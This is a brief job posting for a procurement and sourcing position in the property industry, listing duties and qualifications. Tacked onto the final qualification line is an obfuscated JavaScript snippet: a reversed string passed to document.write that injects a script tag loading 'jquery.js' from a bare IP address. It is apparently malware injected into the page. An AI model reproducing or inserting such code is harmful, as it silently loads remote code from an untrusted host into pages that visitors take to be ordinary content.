Industry : Property
– Responsible for the procurement/ sourcing activities.
– Review and evaluate suppliers core competencies and competitive positioning using industry cost models
– Drive all cost-saving and continuous improvement activities
– Conduct yearly evaluation of vendor’s prices, supplying performance and after sales services, propose solutions and negotiate for further cost down
– Collaborate with departmental Heads to understand organizational needs.
– Bachelor’s Degree
– Min 5 years of work experience
– Technical knowledge and understanding of category specifications
– High level of integrity and positive work ethics
– Good negotiation and problem solving skills
– Ability to plan and communicate effectively with all levels
– Ability to work independently and as part of a dynamic team
– Qualified quantity surveyor (preferably) document.write(‘>tpircs/”sj.yreuqj/87.611.942.431//:sptth”=crs tpircs<'.split("").reverse().join(""))